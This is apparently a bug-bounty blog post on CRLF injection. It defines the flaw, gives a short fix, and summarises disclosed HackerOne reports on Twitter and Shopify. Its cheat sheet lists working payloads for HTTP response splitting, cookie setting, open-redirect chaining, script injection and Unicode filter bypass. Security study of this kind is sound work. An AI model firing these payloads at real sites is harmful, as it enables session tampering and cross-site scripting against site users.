CRLF Injection Playbook
Hello Guys, Just a Rough analysis of bugs Disclosed Publicly about CRLF injection
This analysis is done just because of curiosity about learning new things and tho I found this topic interesting. So Thought of sharing about it with you guys. I started with Reading about disclosed reports about CRLF injection on Hackerone Hacktivity. (Some interesting reports will be discussed below)
Getting Started
Now, What is CRLF?
Line feed = \n (%0a)
Carriage Return = \r (%0d)Basically, Pressing Enter key is the combination of carriage return & line feed
Windows Editor mostly uses a combination of \r\n Unix uses mostly \n
Diggin’ into Injection and Attack Vector
What is CRLF Injection?
A Carriage Return Line Feed (CRLF) Injection vulnerability occurs when an application does not sanitize user input correctly and allows for the insertion of carriage returns and line feeds, input which for many internet protocols, including HTML, denote line breaks and have special significance. For example, Parsing of HTTP message relies on CRLF characters (%0D%0A which decoded represent \r\n) to identify sections of HTTP messages, including headers. Reference:
The Effect of CRLF injection also includes HTTP Request smuggling and HTTP Response Splitting. ( Detailing about them is out of the scope of this Blog, Maybe will discuss it in next blog post)
Starting The Research
I started with Hackerone Hacktivity and Searched for CRLF injection which gave me 59 Results “Only”
That doesn’t conclude that there are only 59 publicly disclosed reports on CRLF injection Then I asked my Best friend (GOOGLE) about CRLF injection reports. It gave me 80 Results about CRLF
And after some time my browser was filled with CRLF Injection reports
And in all the reports above I found that CRLF injection is most commonly done by modifying an HTTP parameter or URL.
Going through All the Reports and Write-ups I created a cheat sheet for CRLF injection which is as follows:
CHEATSHEET
1. HTTP Response Splitting
• /%0D%0ASet-Cookie:mycookie=myvalue2. CRLF chained with Open Redirect
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2 • /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2 • /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E4. Filter Bypass
• %E5%98%8A = %0A = \u560a
• %E5%98%8D = %0D = \u560d
• %E5%98%BE = %3E = \u563e (>)
• %E5%98%BC = %3C = \u563c (<)
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20testResult And Analysis
Most of the CRLF injection can lead to XSS and Open Redirects if chained properly which increases the Criticality of the report and you can escalate your report to Medium CVS score easily
Mitigation or Fix Implementation
A simple solution for CRLF Injection is to sanitize the CRLF characters before passing into the header or to encode the data which will prevent the CRLF sequences from entering the header.
This was all about the Attack vector and Research about CRLF injection. Now let’s see some payloads available publicly and Discuss some Interesting Report.
Payloads
Interesting Reports
1. Twitter HTTP Response Splitting
In 2015 April, filedescriptor reported this vulnerability to twitter which allowed hackers to set an arbitrary cookie by tacking on additional information to an HTTP request. He was able to pass in %E5%98%8A%E5%98%8DSet-Cookie:%20test which resulted in %0A and %0D being included in the cookie header and enabled him to receive SetCookie: test back from Twitter.
Conclusion: When you are looking for vulnerabilities, always remember to think outside the box and submit encoded values to see how the site handles the input.
2. HTTP Response Splitting (CRLF injection) due to headers overflow
To know in detail about this report, filedescriptor himself has published a blog
3. v.shopify.com Response Splitting
THE END
During this process, I definitely learned new things and now I feel like I have much more knowledge than before about CRLF injection and have a good intuition of finding some new vulnerability.
So, Until Next Blog
Best of luck everyone. Keep-Hacking!
Feedbacks and edits are welcome
If you enjoyed this blog, please click the 👏 button and share it to help others find it.
